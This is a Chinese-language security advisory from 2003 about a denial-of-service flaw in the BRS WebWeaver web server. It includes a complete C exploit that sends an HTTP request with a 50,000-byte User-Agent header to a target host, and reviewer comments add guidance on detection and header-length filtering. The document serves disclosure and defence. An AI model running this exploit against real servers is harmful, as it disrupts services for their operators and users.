发布时间:2003-11-04
更新时间:2003-11-04
严重程度:中
威胁程度:远程拒绝服务
错误类型:边界检查错误
利用方式:服务器模式
BUGTRAQ ID:8947
受影响系统
BRS WebWeaver 62 beta
BRS WebWeaver 0.49 beta
BRS WebWeaver 0.50 beta
BRS WebWeaver 0.51 beta
BRS WebWeaver 0.52 beta
BRS WebWeaver 0.60 beta
BRS WebWeaver 0.61 beta
BRS WebWeaver 0.62 beta
BRS WebWeaver 0.63 beta
BRS WebWeaver 1.0 6
BRS WebWeaver 1.0 5
BRS WebWeaver 1.0 4
BRS WebWeaver 1.0 3
BRS WebWeaver 1.0 2
BRS WebWeaver 1.0 1
详细描述
BRS WebWeaver是支持CGI、ISAPI、SSI和基于IP地址的安全控制的WEB服务程序。
当BRS WebWeaver接收到`User-Agent`字段包含超长字符串的HTTP请求时,由于缺少边界检查,可导致服务程序停止响应,远程攻击者可借此造成拒绝服务。
测试代码
/*
* BRS WebWeaver v.1.06 remote DoS exploit
*
* -d4rkgr3y [d4rk securitylab ru]
*
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#define port 80
/*
 * Advisory proof-of-concept for the oversized User-Agent condition described
 * above. It builds one HTTP/1.0 GET request whose User-Agent value is 50000
 * 'A' (0x41) bytes, sends it to TCP port `port` (80) on the host given in
 * argv[1], and closes the socket without reading any reply.
 *
 * Defensive reading: on the wire this is a single request with bare-LF line
 * endings and one header line of roughly 50 KB. The path, Host and
 * Accept-Language literals are arbitrary, so the durable detection signal is
 * the header-line length, not those strings. A maximum header-line length
 * enforced in front of the server (reverse proxy / filtering device) rejects
 * this request before it reaches the affected parser.
 *
 * NOTE(review): pre-C99 style -- main has no return type, `const c` relies on
 * implicit int, and exit/write/close/bzero/inet_addr/htons are called without
 * their declaring headers being included in this file.
 */
main(int argc, char **argv) {
struct hostent *hs;
struct sockaddr_in sock;
int sockfd, i;
/* Number of filler bytes placed in the User-Agent value. `i` above is unused. */
const c = 50000;
/*
 * The initializer is 120 bytes; the rest of the 50150-byte array is
 * zero-filled, which is what keeps every later strlen() call terminated.
 * 120 + 50000 filler + 25 trailer bytes = 50145, leaving room for the NUL.
 */
char request[50150] =
"GET /m00-r0cz HTTP/1.0\n"
"Accept: */*\n"
"Accept-Language: jp\n"
"Accept-Encoding: gzip, deflate\n"
"Host: m00security.org\n"
"User-Agent: ";
printf("BRS WebWeaver v.1.06 remote DoS exploit\n\n");
/* Exactly one argument is required: the host name or dotted IPv4 address. */
if (argc!=2){
printf("usage\n %s hostname\n\n",argv[0]);
exit(1);
}
/* Earlier variant with a hard-coded offset; 98 does not match the 120-byte prefix. */
//memset((request+98),0x41,c);
/* Append c bytes of 0x41 directly after "User-Agent: ". */
memset((request+strlen(request)),0x41,c);
/* l33t ;] */
/*
 * The 25 single-byte stores below append "\nConnection: Keep-Alive\n\n",
 * ending the User-Agent line and then the header section. Each store rescans
 * the whole buffer with strlen() and depends on the zero-filled tail.
 */
request[strlen(request)] = 0x0a;
request[strlen(request)] = 0x43;
request[strlen(request)] = 0x6f;
request[strlen(request)] = 0x6e;
request[strlen(request)] = 0x6e;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x63;
request[strlen(request)] = 0x74;
request[strlen(request)] = 0x69;
request[strlen(request)] = 0x6f;
request[strlen(request)] = 0x6e;
request[strlen(request)] = 0x3a;
request[strlen(request)] = 0x20;
request[strlen(request)] = 0x4b;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x70;
request[strlen(request)] = 0x2d;
request[strlen(request)] = 0x41;
request[strlen(request)] = 0x6c;
request[strlen(request)] = 0x69;
request[strlen(request)] = 0x76;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x0a;
request[strlen(request)] = 0x0a;
/* Destination address: IPv4, fixed port 80 from the `port` macro. */
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
/*
 * Try argv[1] as a dotted-quad first; if inet_addr() reports failure (-1),
 * fall back to a name lookup with gethostbyname().
 */
if ((sock.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
if ((hs=gethostbyname(argv[1]))==NULL) {
printf("damn");
exit(1);
}
printf("~ Host resolved.\n");
/*
 * NOTE(review): family and address length are taken from the resolver result,
 * while the socket below is always AF_INET and the destination field is a
 * 4-byte s_addr; hs->h_length is copied without being checked against it.
 */
sock.sin_family = hs->h_addrtype;
memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
/* NOTE(review): both failure paths below exit with status 0, i.e. "success". */
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("damn"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
perror("damn"); exit(0);
}
printf("~ Socket connected\n");
printf("~ Sending evil code... ");
/*
 * The return value of write() is ignored and no response is read, so the
 * "done" message below is printed unconditionally; the program's output is
 * not evidence that the request was delivered or that the server was affected.
 */
write(sockfd,request,strlen(request));
printf("done\n\n");
close(sockfd);
/* No return statement: main falls off the end. */
}
/* m00 */
相关信息
d4rkgr3y <d4rk@securitylab.ru>.
参考:
http://www.securityfocus.com/archive/1/343111